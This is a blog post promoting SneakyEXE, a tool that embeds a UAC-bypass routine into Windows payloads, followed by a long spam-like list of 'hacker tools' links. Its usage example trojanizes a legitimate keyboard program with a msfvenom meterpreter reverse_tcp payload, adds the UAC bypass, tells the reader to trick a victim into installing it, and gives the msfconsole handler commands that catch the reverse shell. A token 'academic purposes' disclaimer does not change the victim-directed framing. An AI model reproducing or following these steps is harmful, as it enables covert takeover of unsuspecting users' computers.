Saturday 22 August 2020

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload

Posted on 16:53 by Mordiadi


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Related news
  1. Pentest Tools Kali Linux
  2. Pentest Tools For Ubuntu
  3. Hacker Tools 2019
  4. Pentest Tools Tcp Port Scanner
  5. Pentest Tools Tcp Port Scanner
  6. Hacker Tools Apk Download
  7. Tools Used For Hacking
  8. Tools Used For Hacking
  9. Pentest Tools Find Subdomains
  10. Nsa Hacker Tools
  11. Hacker Tools Free
  12. Hacking Tools Free Download
  13. Game Hacking
  14. Hack Tools
  15. Hacking Tools Pc
  16. Pentest Tools Framework
  17. World No 1 Hacker Software
  18. Hacker Tool Kit
  19. Hack Tools
  20. Pentest Tools Subdomain
  21. Hacking Tools
  22. Hacking Tools Software
  23. Hacker Tools Windows
  24. Hack Tools 2019
  25. Nsa Hack Tools
  26. Hacking Tools Pc
  27. Hack Tools For Pc
  28. Pentest Automation Tools
  29. New Hacker Tools
  30. Hacker Tools For Windows
  31. Hack Tool Apk
  32. Hacking App
  33. Hacking Tools For Games
  34. Hak5 Tools
  35. Pentest Tools Kali Linux
  36. Hack Apps
  37. Hacking Tools And Software
  38. Pentest Tools Free
  39. Hacker Search Tools
  40. Hack Tools Github
  41. Wifi Hacker Tools For Windows
  42. Tools For Hacker
  43. Pentest Tools Open Source
  44. Pentest Tools Find Subdomains
  45. Hack App
  46. Hacker Tools Hardware
  47. Beginner Hacker Tools
  48. Pentest Tools Github
  49. Hacker Tool Kit
  50. Hacker Tools 2019
  51. Bluetooth Hacking Tools Kali
  52. Hacker Techniques Tools And Incident Handling
  53. Pentest Tools Website
  54. Hacking Tools For Kali Linux
  55. Hacker Tools Apk
  56. New Hacker Tools
  57. Black Hat Hacker Tools
  58. Hacking Tools Name
  59. Hacker Tools Github
  60. Blackhat Hacker Tools
  61. Hacker Search Tools
  62. World No 1 Hacker Software
  63. Top Pentest Tools
  64. Pentest Tools Find Subdomains
  65. Hacker Tools Free Download
  66. Hacker Tools Github
  67. Nsa Hacker Tools
  68. Physical Pentest Tools
  69. Pentest Tools
  70. Pentest Tools Tcp Port Scanner
  71. Hack Tools 2019
  72. Pentest Tools Subdomain
  73. Pentest Tools Find Subdomains
  74. Hacking Tools Mac
  75. Hacking Tools Windows
  76. Pentest Tools Online
  77. Hack Tools 2019
  78. Hacker Tools
  79. Hack Tool Apk
  80. Hacker Tools Free
  81. Pentest Tools Website Vulnerability
  82. Blackhat Hacker Tools
  83. Pentest Tools Bluekeep
  84. Hack Tools Mac
  85. Hacking Tools For Mac
  86. Hack And Tools
  87. Pentest Tools Download
  88. Beginner Hacker Tools
  89. Hacking Tools 2019
  90. Hacker Tools

No Response to "SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload"

Leave A Reply

BTC

Doge

LTC

BCH

DASH

Tokens

SAMPAI JUMPA LAGI

SEMOGA ANDA MEMPEROLEH SESUATU YANG BERGUNA